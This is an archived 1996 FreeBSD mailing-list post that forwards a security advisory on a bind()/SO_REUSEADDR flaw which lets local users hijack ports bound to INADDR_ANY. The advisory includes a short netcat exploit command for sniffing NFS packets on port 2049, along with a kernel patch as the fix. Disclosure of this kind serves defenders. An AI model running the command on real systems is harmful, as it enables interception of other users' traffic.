Date: Wed, 31 Jan 1996 23:14:58 +0100 (MET) From: guido@gvr.win.tue.nl (Guido van Rooij) To: FreeBSD-hackers@freefall.FreeBSD.org (FreeBSD-hackers) Subject: bind() bug in almost all OS'es Message-ID: <199601312214.XAA15623@gvr.win.tue.nl>
next in thread | raw e-mail | index | archive | help
I posted this on secuirty. This is severe in my eyes. Fortunately there is still the concept of reserved ports but it does not help sniffing nfs ports :-( -Guido Aleph's K-Rad GECOS Field wrote: > From owner-freebsd-security@freefall.freebsd.org Wed Jan 31 16:00:48 1996 > X-Authentication-Warning: suburbia.net: majordom set sender to owner-best-of-security using -f > Date: Tue, 30 Jan 1996 15:18:21 -0800 (PST) > From: "Aleph's K-Rad GECOS Field" <aleph1@underground.org> > To: linux-security@tarsier.cv.nrao.edu > cc: linux-alert@tarsier.cv.nrao.edu, bugtraq@crimelab.com, > best-of-security@suburbia.net > Subject: BoS: bind() Security Problems > Message-ID: <Pine.LNX.3.91.960130151057.4068A-100000@underground.org> > MIME-Version: 1.0 > Content-Type: TEXT/PLAIN; charset=US-ASCII > Reply-To: nobody@mail.uu.net > Sender: owner-security@FreeBSD.org > Precedence: bulk > > > System Call: bind() > Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix > Probably others. > Requirement: account on system. > Security Compromise: Stealing packets from > nfsd, yppasswd, ircd, etc. > Credits: *Hobbit* <hobbit@avian.org> > bitblt <bitblt@infosoc.com> > Aleph One <aleph1@underground.org> > Synopsis: bind() does not properly check > to make sure there is not a socket > already bound to INADDR_ANY on the same > port when binding to a specific address. > > On most systems, a combination of setting the SO_REUSEADDR > socket option, and a call to bind() allows any process to bind to > a port to which a previous process has bound width INADDR_ANY. This > allows a user to bind to the specific address of a server bound to > INADDR_ANY on an unprivileged port, and steal its udp packets/tcp > connection. > > Exploit: > > Download and compile netcat from ftp://ftp.avian.org/src/hacks/nc100.tgz > Make sure an nfs server is running: > > w00p% netstat -a | grep 2049 > udp 0 0 *.2049 *.* LISTEN > > Run netcat: > > w00p% nc -v -v -u -s 192.88.209.5 -p 2049 > listening on [192.88.209.5] 2049 ... > > Wait for packets to arrive. > > Fix: > > Linux: A patch was been sent to Linus and Alan Cox. It should be > included with 1.3.60. My original patch (included bellow) allows for > binds from the same uid, as some virtual hosting software like modified > httpds, and ftpds, may break otherwise. > > Alan didnt like this, so all bind to the same port will > not be allowed in newer kernels. You should be able to easily adapt > this patch or Alan's patch to 1.2.13 without much trouble. > > Others: Pray to your vendors. > > --- begin patch --- > > > diff -u --recursive --new-file linux-1.3.57/net/ipv4/af_inet.c linux/net/ipv4/af_inet.c > --- linux-1.3.57/net/ipv4/af_inet.c Mon Dec 25 20:03:01 1995 > +++ linux/net/ipv4/af_inet.c Tue Jan 16 19:46:28 1996 > @@ -46,6 +46,8 @@ > * Germano Caronni : Assorted small races. > * Alan Cox : sendmsg/recvmsg basic support. > * Alan Cox : Only sendmsg/recvmsg now supported. > + * Aleph One : Rogue processes could steal packets > + * from processes bound to INADDR_ANY. > * > * This program is free software; you can redistribute it and/or > * modify it under the terms of the GNU General Public License > @@ -899,6 +901,12 @@ > > if (sk2->num != snum) > continue; /* more than one */ > + if ((sk2->rcv_saddr == 0 || sk->rcv_saddr == 0) && > + current->euid != sk2->socket->inode->i_uid) > + { > + sti(); > + return(-EADDRINUSE); > + } > if (sk2->rcv_saddr != sk->rcv_saddr) > continue; /* socket per slot ! -FB */ > if (!sk2->reuse || sk2->state==TCP_LISTEN) > > > Aleph One / aleph1@underground.org > http://underground.org/ > KeyID 1024/948FD6B5 > Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 > > > >
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199601312214.XAA15623>